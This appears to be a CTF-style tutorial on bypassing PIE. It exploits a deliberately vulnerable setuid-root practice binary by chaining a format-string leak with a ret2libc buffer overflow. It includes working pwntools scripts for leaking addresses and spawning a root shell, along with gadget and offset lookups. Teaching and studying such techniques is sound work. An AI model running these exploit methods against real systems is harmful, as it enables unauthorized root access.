description |
---|
08/26/2023 |
We're going to start getting pretty deep, so stick this one out with me. We can do this together!
{% embed url="https://ir0nstone.gitbook.io/notes/types/stack/pie" %}
What is PIE?
PIE stands for Position Independent Executable.
When this memory protection is enabled, your program will be loaded at a different base address each time it runs.
This means that you cannot hardcode values such as function addresses and gadget locations without first finding out where they are.
How can we bypass this protection?
Just like anything else, nothing is 100% un-hackable.
A binary protected with PIE is built around relative rather than the usual absolute addresses. This means that its location in memory is randomized, but the offsets between different parts of the binary remain the same.
For example, if you know that `main()` is located `0x128` bytes AFTER the base address of the binary, you can find the runtime location of `main()` and subtract `0x128` from it to get the base address. You can then use the base to compute the address of everything else in the binary.
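The arithmetic above can be sketched in a few lines of Python. This is only an illustration: the two leaked addresses are made-up values, `0x128` is the offset from the example in the text, and the `0x1f0` offset of a second function is hypothetical.

```python
MAIN_OFFSET = 0x128    # offset of main() from the example above
OTHER_OFFSET = 0x1f0   # hypothetical offset of some other function


def binary_base(leaked_main: int) -> int:
    """Recover the base address from a leaked runtime address of main()."""
    return leaked_main - MAIN_OFFSET


def resolve(base: int, offset: int) -> int:
    """Turn a fixed offset into a runtime address for this particular run."""
    return base + offset


# Two made-up runs: the base differs, the offsets do not.
for leaked_main in (0x55d3c0a7e128, 0x5629f1b42128):
    base = binary_base(leaked_main)
    print(hex(base), hex(resolve(base, OTHER_OFFSET)))
```

The point of the loop is that the same two constants work for both runs, even though every absolute address is different.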
How can we exploit a binary with PIE enabled?
Simply put, all we need to do is find a single address and PIE will be bypassed. It is just another slight obstacle we will have to overcome to reach our goal. The rest will stay the same in the exploitation process.
How can we leak this address?
Remember back in format-string-vulnerabilities.md, we were able to leak data off of the stack and from any address?
Be sure to check this out:
{% embed url="https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit" %}
One last thing to consider:
Why does this seem so similar to Address Space Layout Randomization (ASLR)?
This is because they are similar; the difference is in how and where they are applied within the system.
ASLR is an operating-system-level protection that randomizes regions such as the stack, the heap, and shared libraries.
PIE follows a very similar concept; however, it is applied to the binary itself, so that its own code and data can be loaded at a randomized base.
To leak an address, we can utilize a format string bug or any other way to read a value off of the stack.
A leaked code pointer will always be a static offset away from the binary base, enabling us to completely bypass PIE.
NOTE:
The base address of a PIE executable will ALWAYS end in the hexadecimal characters `000`. This is because memory is mapped in pages with a fixed size of `0x1000` bytes, so the randomized base is always page-aligned.
This is very useful for troubleshooting if your exploit is not working as intended.
Check whether the base address ends in `000` if your exploit is acting weird.
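The check described in the note can be automated. The following is a minimal sketch, assuming you already have a leaked value and the offset you believe it sits at; the helper names are hypothetical and not part of any library.

```python
PAGE_SIZE = 0x1000  # page size stated in the note above


def is_page_aligned(addr: int) -> bool:
    """True when the low 12 bits are zero, i.e. the hex form ends in 000."""
    return addr & (PAGE_SIZE - 1) == 0


def checked_base(leak: int, offset: int) -> int:
    """Compute leak - offset and refuse a result that cannot be a real base."""
    base = leak - offset
    if not is_page_aligned(base):
        raise ValueError(f"suspicious base {base:#x}: wrong leak index or offset?")
    return base
```

Failing early like this tends to be easier to debug than a ROP chain that silently jumps to the wrong place.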
We will be combining the last two techniques that we learned, format-string-vulnerabilities.md and ret2libc, and we will also be bypassing the PIE protection.
Ultimately, we need to leak the address of a `libc` function to recover the `libc` base, and then locate the functions that we are most interested in.
In this example, we will first leak a PIE address to bypass PIE!
{% embed url="https://www.youtube.com/watch?v=NAUA1EB-TZg" %} CryptoCat {% endembed %}
{% embed url="https://github.com/Crypto-Cat/CTF/tree/main/pwn/binary_exploitation_101/08-leak_pie_ret2libc" %}
sudo chown root:root flag.txt
sudo chmod 600 flag.txt
sudo chown root:root pie_server
sudo chmod 4655 pie_server
`file`:
{% code overflow="wrap" %}
pie_server: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=358390e52d086a4d5ef65c02f2dff0796b81dc69, for GNU/Linux 3.2.0, not stripped
{% endcode %}
- 64-bit executable
- Dynamically linked to `libc`
- Not stripped
`checksec`:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
- NX is enabled
- PIE is enabled
Let's obtain some additional situational awareness and get a lay of the land just by seeing what the binary does and what it is asking for.
What's the point of this program?
Haha, this is great. The developer is taunting us a little bit with the new PIE protection set in place.
The program is asking us to enter our name, storing our STDIN somewhere in memory and then reflecting it back at us after "Hello <name_entered>".
After we press enter again, the program will exit gracefully.
We were able to segfault by placing a long string of A's in the buffer:
Segmentation Fault
Load up the binary in Ghidra and let's have a look at what we're working with.
I always rename things and convert when needed to make it easier on me.
`main()`:
undefined8 main(void)
{
  setuid(0);
  setgid(0);
  enter_name();
  puts(
      "\nGood luck with your ret2libc, you\'ll never bypass my new PIE protection OR find out where my lib-c library is :P\n"
      );
  vuln();
  return 0;
}
- `setuid` and `setgid` of `0` mean that the executable will run with root privileges, since `0` is the UID/GID of root; this works because the file is owned by root and has the setuid bit set
  - This helps ensure we get full root access upon successful exploitation
- We then make a call to `enter_name()`, which will be analyzed below
- Once that function has finished, we return back to `main()`, use `puts()` to output a string, and call `vuln()`
- After `vuln()`, we `return 0` and exit the program gracefully
`enter_name()`:
void enter_name(void)
{
  char buffer [64];
  puts("Please enter your name:");
  fgets(buffer,64,stdin);
  printf("Hello ");
  printf(buffer);
  return;
}
- We have a char-type buffer with a size of 64 bytes
- `puts()` prints out "Please enter your name:", asking for user input
- `fgets()` stores our input in the pre-defined 64-byte buffer, reading it from `stdin`
  - Note: `fgets()` is not vulnerable here because it limits our input to the size it is given
  - There are some workarounds, but it is much safer than `gets()`
  - `fgets(buffer,64,stdin)` reads at most 63 bytes and appends a null terminator, so an off-by-one is only a concern when the size argument is larger than the buffer
- `printf()` will then display "Hello " followed by our input
  - Note: The second `printf()` is a format string vulnerability, since our STDIN input is passed directly as the format string instead of as an argument to a fixed format such as `%s`
- Lastly, we will return back into `main()`
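Because `fgets()` keeps at most 63 bytes of our input, any format string we send has to fit in that budget. Below is a minimal sketch of a payload builder that enforces this; the function name and the `.` separator are assumptions made for illustration.

```python
MAX_INPUT = 63  # fgets(buffer, 64, stdin) keeps at most 63 bytes plus the NUL


def build_leak_payload(indices, sep=b"."):
    """Build e.g. b'%15$p.%16$p' to print several stack slots as pointers."""
    payload = sep.join(f"%{i}$p".encode() for i in indices)
    # The newline added when the line is sent also counts against the limit.
    if len(payload) + 1 > MAX_INPUT:
        raise ValueError("payload would be truncated by fgets()")
    return payload


print(build_leak_payload([15, 16]))
```

Leaking a handful of slots per run works with this limit; leaking dozens at once does not, which is one reason to fuzz one index per process.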
`vuln()`:
void vuln(void)
{
  char buffer [256];
  gets(buffer);
  return;
}
- We have a char-based buffer with a size of 256 bytes
  - This is reserved for our input
- We then use the vulnerable and deprecated `gets()` function, which reads a line from STDIN into the buffer that it is pointed to (`buffer`) without any bounds checking
- Lastly, we will return to `main()`.
Segfault from gets()
We can actually see our `gets()` function biting us because of our overflow of more than 256 bytes of A's.
Interestingly, one long string at the name prompt is enough: `fgets()` only consumes the first 63 bytes, and the rest of the line is left in STDIN for `gets()` to read, which overflows the 256-byte buffer.
Sending a huge string in `gdb`:
We can see that our return address and registers have been filled with A's due to the use of `gets()`.
Analysis has been completed, so let's begin attacking our binary, which is protected with PIE and NX.
We want to focus on leaking PIE and `libc`.
At a high level, we can break this up into leaking the PIE and `libc` bases, followed by a buffer overflow attack.
We need to find out what the PIE base address is.
To do that, we need to find a stack index whose leaked value sits at the SAME offset from the base EACH time, so that we can use it to calculate the PIE base.
Once we know the base, we know where all of the functions are and can move on to the buffer overflow portion of our attack.
One way to get this leak is with a format string vulnerability, which we will be showcasing here.
For the buffer overflow, we will print out the GOT entry of `puts()`: we `POP` the address of the GOT entry of `puts()` into the `RDI` register as the first parameter.
We will then call `puts()`, which prints the runtime `libc` address of `puts()`, and return back to the start of `main()` or another function such as `vuln()`. We can locate all of these because we already leaked the PIE base.
From there, we perform another buffer overflow and use the `libc` base that we leaked to call `system()`.
If we were to look at our addresses in `gdb` before the program is running, we would see that we do not actually get valid addresses, but rather offsets. This is all the work of PIE.
Viewing offsets of our functions due to PIE
KEEP IN MIND:
Although the BASE ADDRESS will be DIFFERENT EACH time the binary is run, the OFFSET will REMAIN THE SAME with each execution.
To combat the PIE protection, all we need to do is subtract the offset value (which is highlighted in the red boxes in the screenshot above) from the value that we leak, and we will then be at the base of the binary.
Putting it all together:
Leaked value - offset = base of the binary.
So, if we wanted to find `enter_name()`, we can add its offset to the base address and find `enter_name()`!
There are some tools built into `pwndbg` that will help us with this!
- `piebase` -- obtain base of binary
- `breakrva` -- break at offset
To begin, the program must be running.
Set a breakpoint on `main()` and run the program.
We can obtain the offset of our `gets()` call from Ghidra and use `breakrva` to set a breakpoint there.
We see that the offset of the `gets()` call is `0x11f0`:
breakrva 0x11f0
Remember, only the base address will change with PIE enabled, not the offset.
At this point, you can go ahead and delete the breakpoints, since we are now used to the syntax, and generate a cyclic pattern:
delete breakpoints
cyclic 500
Run the program and send the pattern AFTER you enter your name, because that is where the `gets()` call is made, not where your name is being asked. You will see a segmentation fault, which is good.
We want to look at the 8 bytes at the top of the stack (where `RSP` points), because this is what would have been loaded into `RIP`:
We can see the string `iaaaaaab`
cyclic -l iaaaaaab
Offset at 264
Our `RIP` offset is 264, which matches the 256-byte buffer plus the 8-byte saved `RBP`.
This means that we will need 264 bytes of padding before we begin to overwrite the return address.
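To make the layout concrete, here is a minimal sketch of how such a payload is assembled without pwntools. The `0x4141414141414141` return address is a placeholder, and the newline check is an addition based on the fact that `gets()` stops reading at the first newline.

```python
import struct

RIP_OFFSET = 264  # found with cyclic above


def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)


def overflow_payload(*chain: int) -> bytes:
    """264 bytes of padding followed by the 8-byte entries of a ROP chain."""
    payload = b"A" * RIP_OFFSET + b"".join(p64(v) for v in chain)
    # gets() stops at a newline, so a 0x0a byte would cut the payload short.
    if b"\n" in payload:
        raise ValueError("payload contains a newline byte")
    return payload


payload = overflow_payload(0x4141414141414141)  # placeholder return address
print(len(payload))
```

Everything after the first 264 bytes is consumed as return addresses and arguments, 8 bytes at a time.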
This time we will be overwriting the return address with a ROP chain that calls `puts()` to leak the runtime address of `puts()` and then goes back to the start of the `vuln()` function.
Next, we will send another ROP chain to call `system("/bin/sh")`.
Before that, we need to find out which format string index leaks a usable address. We can utilize the following script for this.
`fuzz.py`:
import sys

from pwn import *


# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Specify your GDB script here for debugging
gdbscript = '''
init-pwndbg
piebase
continue
'''.format(**locals())

# Set up pwntools for the correct architecture
exe = './pie_server'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Only show warnings and errors so the fuzz output stays readable (use info/debug for more)
context.log_level = 'warning'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

# Let's fuzz x values (positional arguments are numbered from 1)
for i in range(1, 30):
    try:
        # A fresh process per index keeps each payload short
        p = start()
        # Format the counter
        # e.g. %2$p will attempt to print the 2nd argument as a pointer
        p.sendlineafter(b':', '%{}$p'.format(i).encode())
        # Receive the response
        p.recvuntil(b'Hello ')
        result = p.recvline()
        print(str(i) + ': ' + str(result))
        p.close()
    except EOFError:
        pass
Results of `fuzz.py`:
Our 15th element looks interesting
Run this a few times and you will see that we are printing strictly pointers due to the `%p` specifier.
It's good practice to `unhex` anything that seems interesting.
Also, be on the lookout for addresses/offsets that do not change upon repeated execution.
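- Run this script at least twice
- Values that do not change per execution:
0x5555555596b0 0x555555555224 0x5555555551f8 0x7fffffffe198
If ASLR is active in your environment, the full values will differ between runs; in that case, compare the last three hex digits instead.
One cool thing to note is that addresses starting with `0x7f` usually point to something outside of the binary, such as the stack or `libc`!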
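Comparing two runs by eye gets tedious, so the comparison can be scripted. The sketch below assumes you have collected the output of two `fuzz.py` runs into dictionaries mapping index to value; the function names and the sample data in the usage note are hypothetical.

```python
def parse_pointer(line: bytes):
    """Parse one fuzz.py response such as b'0x555555555224\\n'; None for '(nil)'."""
    text = line.strip()
    return int(text, 16) if text.startswith(b"0x") else None


def stable_indices(run_a: dict, run_b: dict, mask: int = 0xFFF) -> list:
    """Indices whose leaked values share the same low 12 bits in both runs."""
    return sorted(
        i for i in run_a.keys() & run_b.keys()
        if run_a[i] & mask == run_b[i] & mask
    )
```

For example, `stable_indices({14: 0x7ffd1234e198, 15: 0x55d3c0a7f224}, {14: 0x7ffc99aa0338, 15: 0x5629f1b43224})` keeps only index 15. Treat the result as a list of candidates: constants that are not pointers at all will also pass this filter.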
Take the leaked address and subtract the `piebase` from it:
pwndbg> x 0x555555555224 - 0x555555554000
0x1224: Cannot access memory at address 0x1224
The offset is `0x1224`.
- Leak the 15th element off of the stack, subtract `0x1224` from it, and you now have the base of the binary
- To find your way to another function, add the offset of that function to the base
- You want to look for PIE addresses; they usually start with `0x56`, `0x55`, or `0x54`
- If the last 3 hex digits of a leaked value do not change between runs, you have likely identified a fixed offset from the PIE base
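As a small worked example of these steps, the sketch below parses a response line and rebases one gadget, using the values from this walkthrough (`0x1224`, and the `0x12ab` gadget offset that `ropper` reports for this binary). The sample response is the value seen in the `pwndbg` session, and `parse_leak` is a hypothetical helper.

```python
LEAK_OFFSET = 0x1224     # leaked value minus piebase, from the pwndbg output
POP_RDI_OFFSET = 0x12ab  # pop rdi; ret gadget offset reported by ropper


def parse_leak(response: bytes) -> int:
    """Extract the pointer from a line such as b'Hello 0x555555555224\\n'."""
    line = response.split(b"\n")[0]
    # removeprefix (Python 3.9+) drops the exact prefix; lstrip(b'Hello ')
    # would instead strip any leading characters from {H, e, l, o, space}.
    return int(line.removeprefix(b"Hello "), 16)


pie_base = parse_leak(b"Hello 0x555555555224\n") - LEAK_OFFSET
pop_rdi = pie_base + POP_RDI_OFFSET
print(hex(pie_base), hex(pop_rdi))
```

Note that the computed base ends in `000`, which is a quick sign that the index and offset are consistent.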
`exploit.py`:
from pwn import *

# Load the target binary and the libc it is linked against (checksec output disabled)
exe = context.binary = ELF('./pie_server', checksec=False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
context.terminal = ['mate-terminal', '-e']

# Enable or disable debugging verbosity
# context.log_level = 'debug'

p = exe.process()
# p = remote('hack.me', 31081)

# Offset to the saved return address, found with cyclic
offset = 264

##################### pie leak ######################
# Target the 15th element on the stack with the format string vulnerability to leak PIE
p.sendlineafter(b'name:\n', b'%15$p')
p.recvuntil(b'Hello ')
leak = p.recvline().strip()

# Leaked Address (0x555555555224) - PIEBASE (0x555555554000) = Offset of 0x1224
pie_base = int(leak, 16) - 0x1224
log.info(f'pie base: {hex(pie_base)}')

# Consume the taunt printed by main() so the next read only sees our libc leak
p.recvuntil(b':P\n\n')

# gdb.attach(p, gdbscript=f'xinfo {pie_base}')
# pause()
# p.interactive()
######################################################

##################### libc leak ######################
# Rebase the ELF so symbols, GOT entries, and gadgets resolve to runtime addresses
exe.address = pie_base

# puts(puts@got) prints the resolved address of puts(), then we return into vuln()
rop = ROP(exe)
rop.puts(exe.got.puts)
rop.vuln()

payload = flat({
    offset: [
        rop.chain()
    ],
})

p.sendline(payload)
# puts() stops at the first null byte, so pad the leak back to 8 bytes
leak = p.recvline().rstrip(b'\n')
puts_got_leak = u64(leak.ljust(8, b'\x00'))
libc_base = puts_got_leak - libc.symbols['puts']
log.info(f'libc base: {hex(libc_base)}')

# gdb.attach(p, gdbscript=f'xinfo {libc_base}')
# pause()
# p.interactive()
######################################################

####################### shell ########################
libc.address = libc_base

# system("/bin/sh"), using gadgets and the string found inside libc
rop = ROP(libc)
rop.system(next(libc.search(b'/bin/sh\x00')))

payload = flat({
    offset: [
        # Extra ret keeps the stack 16-byte aligned for system()
        rop.find_gadget(['ret'])[0],
        rop.chain()
    ],
})

p.sendline(payload)
p.interactive()
Be aware, you will more than likely need to adjust this exploit, because your environment variables and the addresses/offsets in your `libc` library will be different.
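The `u64(leak.ljust(8, b'\x00'))` step in the script is worth unpacking: `puts()` stops printing at the first null byte, so a typical 64-bit user-space address arrives as only 6 bytes and has to be padded before it can be converted to an integer. Here is a minimal sketch of that conversion using only the standard library. The sample bytes and the `0x80e50` offset are hypothetical values chosen for illustration; read the real offset of `puts` from your own `libc`.

```python
import struct

HYPOTHETICAL_PUTS_OFFSET = 0x80e50  # placeholder, not taken from the output above


def u64_leak(raw: bytes) -> int:
    """Pad a short leak to 8 bytes and unpack it as a little-endian integer."""
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def libc_base_from(puts_leak: bytes, puts_offset: int) -> int:
    """Runtime address of puts() minus its offset inside libc."""
    return u64_leak(puts_leak) - puts_offset


sample = bytes.fromhex("500ec8f7ff7f")  # made-up 6-byte leak
print(hex(libc_base_from(sample, HYPOTHETICAL_PUTS_OFFSET)))
```

As with the PIE base, a `libc` base that does not end in `000` suggests the wrong `libc` file or a truncated leak.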
Obtain the ROP gadget via `ropper`:
ropper --file pie_server --search "pop rdi"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdi
[INFO] File: pie_server
0x00000000000012ab: pop rdi; ret;
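The gadget is at offset `0x12ab`.
Remember, we want to `POP` the address of the GOT entry of `puts()` into the `RDI` register as the first parameter; that is why we need a ROP gadget.
But we can't use the `POP RDI` gadget until we have the leaked PIE base, because `0x12ab` is only an offset from it.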
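To show what the first-stage chain looks like on the stack, here is a hand-built sketch of the layout that pwntools generates from `rop.puts(exe.got.puts)` followed by `rop.vuln()`. Only `0x12ab` comes from the `ropper` output; the offsets for `puts@plt`, `puts@got`, and `vuln` are hypothetical placeholders that you would read from your own binary.

```python
import struct

POP_RDI = 0x12ab   # pop rdi; ret (from the ropper output above)
PUTS_PLT = 0x1030  # hypothetical offset
PUTS_GOT = 0x4018  # hypothetical offset
VULN = 0x11d0      # hypothetical offset


def leak_chain(pie_base: int) -> bytes:
    """pop rdi; ret -> puts@got -> puts@plt -> vuln, all rebased on pie_base."""
    entries = [
        pie_base + POP_RDI,   # load the next stack value into RDI
        pie_base + PUTS_GOT,  # argument: address of the GOT slot for puts()
        pie_base + PUTS_PLT,  # call puts(), printing the resolved libc address
        pie_base + VULN,      # return into vuln() for the second overflow
    ]
    return b"".join(struct.pack("<Q", e) for e in entries)


print(leak_chain(0x555555554000).hex())
```

Every entry is an offset added to the leaked base, which is why none of this can be built before the format string leak.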
`libc` base:
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep puts
524: 000000000012ccd0 660 FUNC GLOBAL DEFAULT 15 putsgent@@GLIBC_2.10
Obtain the `system()` and `"/bin/sh"` offsets:
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
1481: 0000000000050d60 45 FUNC WEAK DEFAULT 15 system@@GLIBC_2.2.5
strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep /bin/sh
1d8698 /bin/sh
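With these two offsets and a leaked `libc` base, the second-stage chain can be laid out by hand. The sketch below is one possible variant, not what `exploit.py` does: it reuses the `pop rdi; ret` gadget from `pie_server` instead of searching `libc` for gadgets, and it derives a bare `ret` from the byte after `pop rdi`. The base addresses in the usage line are made-up values.

```python
import struct

SYSTEM_OFFSET = 0x50d60   # from the readelf output above
BIN_SH_OFFSET = 0x1d8698  # from the strings output above
POP_RDI = 0x12ab          # pop rdi; ret inside pie_server (ropper output)
RET = POP_RDI + 1         # pop rdi is a single byte (0x5f), so ret follows it


def shell_chain(pie_base: int, libc_base: int) -> bytes:
    """ret -> pop rdi; ret -> "/bin/sh" -> system, packed as 8-byte entries."""
    entries = [
        pie_base + RET,             # extra ret, typically needed for stack alignment
        pie_base + POP_RDI,         # load the next stack value into RDI
        libc_base + BIN_SH_OFFSET,  # argument: pointer to "/bin/sh"
        libc_base + SYSTEM_OFFSET,  # system("/bin/sh")
    ]
    return b"".join(struct.pack("<Q", e) for e in entries)


print(shell_chain(0x555555554000, 0x7ffff7c00000).hex())
```

The offsets are specific to the `libc` build shown above, so they will differ on another system.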
If we were to feed these values to `gdb`, we would get some pretty cool data back.
Utilize this database to find offsets:
{% embed url="https://libc.blukat.me/" %}
Although we identified our PIE base, it does not seem to be very interesting when examining the data:
Running our exploit:
To reiterate from earlier:
In this tutorial, we leaked a PIE address utilizing a format string bug and then leaked a `libc` address utilizing a buffer overflow.
To exploit the vulnerable buffer via the overflow caused by `gets()`, we print out the GOT entry of `puts()`: we `POP` the address of the GOT entry of `puts()` into the `RDI` register as the first parameter.
`puts()` GOT entry -> `POP RDI` -> first parameter
We then call `puts()` and return back to the start of `main()` or another function such as `vuln()`, which is possible because we leaked the PIE base.
From there, we perform another buffer overflow and use the `libc` base that we leaked to call `system("/bin/sh")`, ultimately granting us a shell with root access.